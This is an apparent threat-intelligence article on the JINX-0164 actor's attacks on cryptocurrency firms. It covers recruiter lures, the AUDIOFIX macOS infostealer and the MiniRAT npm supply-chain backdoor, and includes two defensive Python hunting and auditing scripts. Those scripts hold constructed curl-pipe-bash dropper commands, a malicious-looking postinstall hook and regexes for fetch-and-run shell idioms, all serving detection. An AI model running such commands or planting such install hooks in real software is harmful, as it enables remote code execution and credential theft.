JINX-0164: Unmasking the Cyber Threat Targeting Cryptocurrency Firms
A newly identified cyber threat actor, designated as JINX-0164, has been orchestrating sophisticated attacks against cryptocurrency organizations since at least mid-2025. These operations are primarily financially motivated, aiming to siphon digital assets through advanced social engineering tactics and custom macOS malware.
Sophisticated Social Engineering Tactics
JINX-0164 employs highly convincing social engineering to get a foothold in target organizations. The group initiates contact through credible-looking LinkedIn profiles, posing as recruiters with attractive job offers. Targets are then invited to a virtual meeting hosted on an attacker-controlled domain that imitates a legitimate teleconferencing platform.
During the fraudulent meeting the victim is presented with a fabricated technical problem and told to download a "fix". Running that file installs the malware, giving the attackers access to the host.
Deployment of Custom macOS Malware
Central to JINX-0164’s strategy is the deployment of a bespoke macOS malware known as AUDIOFIX. This Python-based infostealer and remote access trojan is delivered through a bash script hosted on a counterfeit driver store domain (apple.driver-store[.]com).
The bash script checks the host's CPU architecture so that it can fetch a build that runs on either Intel or Apple Silicon. It downloads a payload named coreaudiod (the name of the genuine macOS audio daemon), writes it to disk as ChromeUpdater, and starts it via launchctl. Neither name is a reliable indicator by itself; what stands out is a coreaudiod that is not the system's own binary, or a ChromeUpdater that launchd runs from a user-writable location.
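The delivery chain above leaves two artifacts a responder can hunt for on a macOS host: the launchd configuration that runs the renamed payload, and the shell history of the user who ran the dropper. The script below is an added example and is not code from the original article or from the actor's tooling. It assumes the launchctl step registers a LaunchAgent or LaunchDaemon plist (the article only says the payload is executed via launchctl), it takes /usr/sbin/coreaudiod as the genuine daemon's location, and the plist, label and history lines it checks are constructed samples, not recovered indicators. It goes slightly beyond the text by also flagging any coreaudiod that launchd runs from somewhere other than the system path.

```python
"""Hunt for the AUDIOFIX delivery chain on a macOS host (added example)."""
import plistlib
import re
from typing import Dict, List

# Indicators taken from the article text.
DROPPER_DOMAIN = "apple.driver-store.com"
PAYLOAD_ON_DISK = "ChromeUpdater"
IMPERSONATED_BINARY = "coreaudiod"
# Where the genuine daemon lives on macOS (assumption used by the location check).
GENUINE_COREAUDIOD = "/usr/sbin/coreaudiod"

# Constructed sample: a LaunchAgent plist as the dropper might write it.
# The label and path are placeholders, not recovered indicators.
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.chromeupdater</string>
  <key>ProgramArguments</key><array>
    <string>/Users/alice/Library/Application Support/ChromeUpdater</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>
"""

# Constructed sample: a benign plist for comparison.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key><array>
    <string>/usr/local/bin/backup</string><string>--daily</string>
  </array>
</dict></plist>
"""

# Constructed sample of ~/.zsh_history (extended format): a curl-pipe-bash
# fetch of the dropper, the dropper's architecture check, the launchctl
# step, and an innocent command.
ZSH_HISTORY = """: 1720000000:0;curl -fsSL https://apple.driver-store.com/fix.sh | bash
: 1720000005:0;uname -m
: 1720000010:0;launchctl load ~/Library/LaunchAgents/com.google.chromeupdater.plist
: 1720000100:0;git status
"""


def launchd_program(plist_bytes: bytes) -> List[str]:
    """Return the command launchd would run: ProgramArguments, or Program alone."""
    data = plistlib.loads(plist_bytes)
    if "ProgramArguments" in data:
        return list(data["ProgramArguments"])
    return [data["Program"]] if "Program" in data else []


def check_launchd_plist(plist_bytes: bytes) -> List[str]:
    """Flag plists whose executable is the renamed payload, or a coreaudiod
    outside its genuine location; note user-home paths as an extra signal."""
    findings: List[str] = []
    argv = launchd_program(plist_bytes)
    if not argv:
        return findings
    exe = argv[0]
    basename = exe.rsplit("/", 1)[-1]
    if basename == PAYLOAD_ON_DISK:
        findings.append(f"launchd runs {PAYLOAD_ON_DISK}: {exe}")
    if basename == IMPERSONATED_BINARY and exe != GENUINE_COREAUDIOD:
        findings.append(f"{IMPERSONATED_BINARY} outside {GENUINE_COREAUDIOD}: {exe}")
    if findings and exe.startswith("/Users/"):
        findings.append(f"executable lives under a user home directory: {exe}")
    return findings


# curl/wget fetch of the dropper domain, and launchctl loading the payload.
FETCH_RE = re.compile(r"\b(curl|wget)\b[^\n]*" + re.escape(DROPPER_DOMAIN))
LAUNCHCTL_RE = re.compile(
    r"\blaunchctl\s+(load|bootstrap)\b[^\n]*" + PAYLOAD_ON_DISK, re.IGNORECASE
)


def check_shell_history(history: str) -> List[str]:
    """Return history commands that fetch the dropper domain or load the payload."""
    hits: List[str] = []
    for line in history.splitlines():
        # Strip the ": <timestamp>:<elapsed>;" prefix of zsh extended history.
        cmd = line.split(";", 1)[1] if line.startswith(": ") and ";" in line else line
        if FETCH_RE.search(cmd) or LAUNCHCTL_RE.search(cmd):
            hits.append(cmd)
    return hits


def hunt(plists: Dict[str, bytes], history: str) -> Dict[str, List[str]]:
    """Run both checks; return only artifacts that produced findings."""
    report = {name: check_launchd_plist(p) for name, p in plists.items()}
    report["shell_history"] = check_shell_history(history)
    return {k: v for k, v in report.items() if v}


if __name__ == "__main__":
    samples = {"com.google.chromeupdater.plist": SUSPICIOUS_PLIST,
               "com.example.backup.plist": BENIGN_PLIST}
    for artifact, findings in hunt(samples, ZSH_HISTORY).items():
        for f in findings:
            print(f"[{artifact}] {f}")
```

On a live host the plist bytes would come from ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons, and the history from each user's shell history file; the checks themselves need no network access and can be run against a forensic image.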
Comprehensive Data Exfiltration
Once installed, AUDIOFIX systematically harvests a wide array of sensitive information from the compromised system, including:
– Credentials from password managers, web browsers, and iCloud Keychain files
– Local administrator credentials
– SSH keys
– Configuration and console history files
– Information from cryptocurrency browser extensions
– Cryptocurrency wallet addresses
– Active sessions on platforms like Discord, Slack, and Telegram
Beyond this automated collection, AUDIOFIX accepts operator commands for manual reconnaissance, data exfiltration, execution of arbitrary shell commands, file deletion, and retrieval of additional payloads from external servers.
Lateral Movement and Supply Chain Compromise
JINX-0164's operations do not stop at the initial host. The group has shown that it can move laterally within a victim's network to reach internal code distribution systems and development infrastructure. By planting the AUDIOFIX payload in those systems, the attackers can tamper with source code that is distributed to other endpoints, compromising them in turn and opening further avenues for cryptocurrency theft.
Utilization of MiniRAT Backdoor
Another significant tool in JINX-0164’s arsenal is MiniRAT, a Go-based backdoor previously distributed via a compromised version of the npm package @velora-dex/sdk. This legitimate DeFi toolkit is used for token swaps, limit orders, and delta trading on the VeloraDEX decentralized exchange platform.
The tampered package downloads a shell script from a remote server, which in turn fetches a macOS-specific binary called MiniRAT. The backdoor can upload files, execute arbitrary shell commands, and retrieve additional payloads or tools from attacker-controlled domains.
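Both the compromised @velora-dex/sdk release and the attack on internal code distribution systems described earlier come down to the same question for a defender: does anything in the dependency tree fetch and run code at install time, and does every installed package come from where the lockfile says it should? The script below is an added example and is not code from the article, from VeloraDEX or from npm. The article says only that the tampered package downloads a shell script; that it does so from a lifecycle script (preinstall, install, postinstall) is an assumption, the manifests and lockfile are constructed, the version string and URLs are placeholders, and the expected registry is a parameter so the same check can be pointed at an internal registry.

```python
"""Audit npm manifests and a lockfile for install-time remote code execution
and off-registry tarballs (added example; all inputs constructed)."""
import json
import re
from typing import Dict, List

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
EXPECTED_REGISTRY = "https://registry.npmjs.org/"

# Shell idioms for "download something and execute it".
REMOTE_EXEC_PATTERNS = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),             # curl ... | sh
    re.compile(r"\b(ba|z)?sh\s+-c\s+[\"']?\$\((curl|wget)\b"),    # sh -c "$(curl ...)"
    re.compile(r"\b(curl|wget)\b.*&&\s*(ba|z)?sh\b"),             # curl -o x.sh && sh x.sh
    re.compile(r"\bnode\s+-e\b.*\bhttps?://"),                    # node -e with a URL
]

# Constructed: how a tampered manifest might look. Version and URL are
# placeholders, not the real compromised release.
TAMPERED_MANIFEST = {
    "name": "@velora-dex/sdk",
    "version": "0.0.0-example",
    "scripts": {
        "postinstall": "curl -fsSL https://example.invalid/setup.sh | bash",
        "build": "tsc -p .",
    },
}
# Constructed: a manifest whose only script is a normal test step.
CLEAN_MANIFEST = {"name": "left-pad", "version": "1.3.0",
                  "scripts": {"test": "node test.js"}}

# Constructed package-lock.json (lockfileVersion 3 layout) with one entry
# resolved from an unexpected host. Integrity values are placeholders.
LOCKFILE = json.dumps({
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "version": "1.0.0"},
        "node_modules/@velora-dex/sdk": {
            "version": "0.0.0-example",
            "resolved": "https://example.invalid/sdk-0.0.0.tgz",
            "integrity": "sha512-AAAA",
        },
        "node_modules/left-pad": {
            "version": "1.3.0",
            "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
            "integrity": "sha512-BBBB",
        },
    },
})


def suspicious_lifecycle_scripts(manifest: dict) -> List[str]:
    """Return 'name hook: command' for lifecycle hooks that fetch and run remote code."""
    hits: List[str] = []
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd and any(p.search(cmd) for p in REMOTE_EXEC_PATTERNS):
            hits.append(f"{manifest.get('name')} {hook}: {cmd}")
    return hits


def off_registry_packages(lockfile_text: str,
                          registry: str = EXPECTED_REGISTRY) -> List[str]:
    """Return lockfile entries not resolved from the expected registry, or
    lacking an integrity hash. The root project entry ("") is skipped."""
    lock = json.loads(lockfile_text)
    bad: List[str] = []
    for path, entry in lock.get("packages", {}).items():
        if not path:
            continue
        resolved = entry.get("resolved", "")
        if not resolved.startswith(registry):
            bad.append(f"{path}: resolved from {resolved or '<none>'}")
        if not entry.get("integrity"):
            bad.append(f"{path}: no integrity hash")
    return bad


def audit(manifests: List[dict], lockfile_text: str,
          registry: str = EXPECTED_REGISTRY) -> Dict[str, List[str]]:
    """Combine both checks into one report."""
    report = {"lifecycle": [], "lockfile": off_registry_packages(lockfile_text, registry)}
    for m in manifests:
        report["lifecycle"].extend(suspicious_lifecycle_scripts(m))
    return report


if __name__ == "__main__":
    for section, findings in audit([TAMPERED_MANIFEST, CLEAN_MANIFEST], LOCKFILE).items():
        for f in findings:
            print(f"[{section}] {f}")
```

In a real tree the manifests come from every node_modules/*/package.json (including scoped packages under node_modules/@scope/), and the audit belongs in CI before `npm install` is allowed to run lifecycle scripts at all; `npm install --ignore-scripts` followed by a review of what the scripts would have done removes the install-time window this kind of tampering depends on.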
Potential Links to North Korean Threat Actors
While JINX-0164's tactics resemble those of North Korean clusters such as BlueNoroff, Contagious Interview, and UNC1069, the current evidence does not establish a direct connection, and no infrastructure overlap with those Pyongyang-linked groups has been identified.
Implications for the Cryptocurrency Sector
The emergence of JINX-0164 underscores how targeted and well-resourced attacks on the cryptocurrency industry have become. Organizations in the sector should treat unsolicited recruiter contact and meeting-site "fixes" as hostile by default, watch for unexpected launchd persistence and renamed system binaries on macOS endpoints, and review what their npm dependencies do at install time, since both the initial access and the supply chain vectors described here rely on a user or a build running code from a source they did not verify.